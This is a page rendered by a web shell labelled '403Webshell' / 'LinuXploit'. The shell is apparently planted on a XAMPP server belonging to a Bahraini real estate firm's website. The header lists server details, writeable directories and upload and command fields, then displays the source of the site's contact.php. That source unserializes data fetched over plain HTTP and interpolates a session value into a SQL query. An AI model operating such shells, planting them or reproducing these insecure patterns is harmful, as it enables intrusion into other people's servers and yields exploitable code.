403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xampp/htdocs-khalafsons/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : D:/xampp/htdocs-khalafsons/contact.php
<html>
<head>
<title>khalafsons.com</title>
<link rel="icon" type="image/jpg" href="http://khalafsons.com/kvt_con/khalaf_log.jpg" />

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/contact.css" >


</head>

<?php 
session_start();
include('db_con.php'); 
include('function.php');
?>

<?php

if(isset($_SESSION['id']))
{
	$my_id = $_SESSION['id'];
    $my_cpr = $_SESSION['user_cpr'];
	
	//echo $_SESSION['id'];
//	echo"$user_email";
}
?>
<span style="display:none;">
<input id="my_id" style="display:none;" value="<?php echo"$my_id";?>" />
<input id="my_cpr" style="display:none;" value="<?php echo"$my_cpr";?>" />

 <?php
$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
/*echo"$user_ip";
echo "City: ".$city."<br>";
echo "Region: ".$region."<br>";
echo "Country: ".$country."<br>";
/*
geoplugin_request
geoplugin_status
geoplugin_credit
geoplugin_city
geoplugin_region
geoplugin_areaCode
geoplugin_dmaCode
geoplugin_countryCode
geoplugin_countryName
geoplugin_continentCode
geoplugin_latitude
geoplugin_longitude
geoplugin_regionCode
geoplugin_regionName
geoplugin_currencyCode
geoplugin_currencySymbol
geoplugin_currencySymbol_UTF8
geoplugin_currencyConverter
*/
?>

<input type="text" id="country_user" class="helping_id" style="display:none;" value="<?php echo $country;?>"> 
<input type="text" id="region_user" class="helping_id" style="display:none;" value="<?php echo $region;?>">
<input type="text" id="city_user" class="helping_id" style="display:none;" value="<?php echo $city;?>">

</span>

<body id="body">

<div class="main_home">

<div class="main_log">

<img src="kvt_con/khalaf_log.jpg" width="100%" height="100%" style="border-radius:20px;" classk="main_home_icon" />

</div>

<div class="main_text_title">Khalaf Sons Estate</div>

<a href="index.php"><button class="main_home_btn" onmouseover="close_more_home_btn_area();">Home</button></a>

<a href="projects.php"><button onClick="show_main_container();" class="main_home_btn" onmouseover="close_more_home_btn_area();">Projects</button></a>
<a href="property.php"><button class="main_home_btn" onmouseover="close_more_home_btn_area();">Properties</button></a>
<button class="main_home_btn" onmouseover="close_more_home_btn_area();">Contacts</button>

<div class="icon_div_right" >

<img onClick="show_search_area();" src="kvt_con/search_icon.png" class="top_right_icons" />
<a href="https://www.facebook.com/Khalaf-Sons-Real-Estate-WLL-899406336847138/" ><img src="kvt_con/fb_icon.png" class="top_right_icons" /></a>
<!--img src="kvt_con/instagram_icon.png" class="top_right_icons" /-->
<a href="https://www.linkedin.com/company/khalaf-sons-real-estate/?viewAsMember=true" ><img src="kvt_con/linkedin.png" class="top_right_icons" /></a>


</div>


<div class="icon_div_right_mob" >


<img id="show_mob_menu_btn" onClick="show_mob_menu();" src="kvt_con/menu.png" class="top_right_mob_menu_icon" />
<img id="close_mob_menu_btn" onClick="close_mob_menu();" src="kvt_con/close_mob_menu.png" class="top_right_mob_menu_icon" style="display:none;" />

<script>

function show_mob_menu()
{
document.getElementById('main_home_left_mob').style.display="block";
document.getElementById('show_mob_menu_btn').style.display="none";
document.getElementById('close_mob_menu_btn').style.display="block";

//alert('woop');
window.scrollTo(0,0);
}

function close_mob_menu()
{
document.getElementById('main_home_left_mob').style.display="none";
document.getElementById('show_mob_menu_btn').style.display="block";
document.getElementById('close_mob_menu_btn').style.display="none";

}



</script>

</div><!-- end of icon_div_right_mob-->



</div>

<div class="positioning_main_home"></div>

<div  class="main_home_left_mob" >
<div id="main_home_left_mob" style="display:none;" class="sub_home_left_mob" >

<a href="index.php"><button class="left_home_btn" >Home</button></a>
<!--button class="left_home_btn">Project</button-->
<a href="property.php"><button class="left_home_btn">Property</button></a>
<!--button onClick="show_upload_cv_div();" class="left_home_btn">Vacancies</button-->
<a href="jobs.php"><button class="left_home_btn">Jobs</button></a>
<a href="contact.php"><button class="left_home_btn">Contacts</button></a>
<a href="agent_page.php"><button class="left_home_btn">Our Agents</button></a>
<a href=""><button class="left_home_btn">About</button></a>
<button onClick="show_mob_share_div();" class="left_home_btn">Share</button>
<?php
if(isset($_SESSION['id']))
{
		$my_id = $_SESSION['id'];
	
	$get_user ="select * from khalaf_admintb where user_id_adm='$my_id' ";
	$run_get_user = mysqli_query($con,$get_user);
	$check_user = mysqli_num_rows($run_get_user);
	if($check_user >0){
?>
<a href="extraction.php"><button class="left_home_btn">Extraction</button></a>

<?php } ?>

<a href="myaccount.php"><button class="left_home_btn">Myaccount</button></a>
<a href="log_out.php"><button class="left_home_btn">Log out</button></a>
<?php
}else{?>

<a href="log_in.php"><button class="left_home_btn">Sign in</button></a>
<?php } ?>
</div>
</div><!-- end of main_home_left_mob-->


<div class="container">

<div class="contact_title" >Contact Us</div>

<div class="contact_log" >

<img src="kvt_con/khalaf_log.jpg" width="100%" height="100%"  />

</div>


<div class="contact_text" >

<div class="contact_tel" >Tel : +973 17822550</div>
<div class="contact_tel" > Fax : +973 17822551</div>
<!--div class="contact_tel" >Mob : +973 39980055 </div-->
<div class="contact_tel" >Mob : +973 35055392 </div>
<div class="contact_tel" >P.O Box 2002-Manama Kingdom of Bahrain</div>
<div class="contact_tel" >Emails:</div>
<div class="contact_tel" >accounts@khalafsonsrealestate.com</div>
<div class="contact_tel" >hr@khalafsonsrealestate.com</div>
<div class="contact_tel" >maintenance@khalafsonsrealestate.com</div>

</div>

</div>


<div class="map_container" >
<!--iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d7159.414905910275!2d50.575076547977424!3d26.206193229702162!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3e49af25ef5ed457%3A0xe4d99d85ac69795!2sRd+No+3321%2C+Manama!5e0!3m2!1sen!2sbh!4v1549980213985" width="100%" height="500" frameborder="0" style="border:0" allowfullscreen></iframe-->
<iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d14318.248888604554!2d50.5789085!3d26.2109156!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x1f5edcb42b08d1ff!2sKhalaf%20Sons%20Real%20Estate!5e0!3m2!1sen!2sbh!4v1577621262262!5m2!1sen!2sbh" width="100%" height="500" frameborder="0" style="border:0;" allowfullscreen=""></iframe>
</div>


<div style="float:left;width:100%;height:100px;background:black;color:white;margin-top:20px;text-align:center;font-size:1.2em;">@Khalaf Sons Real Estate 2020.</div>



</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit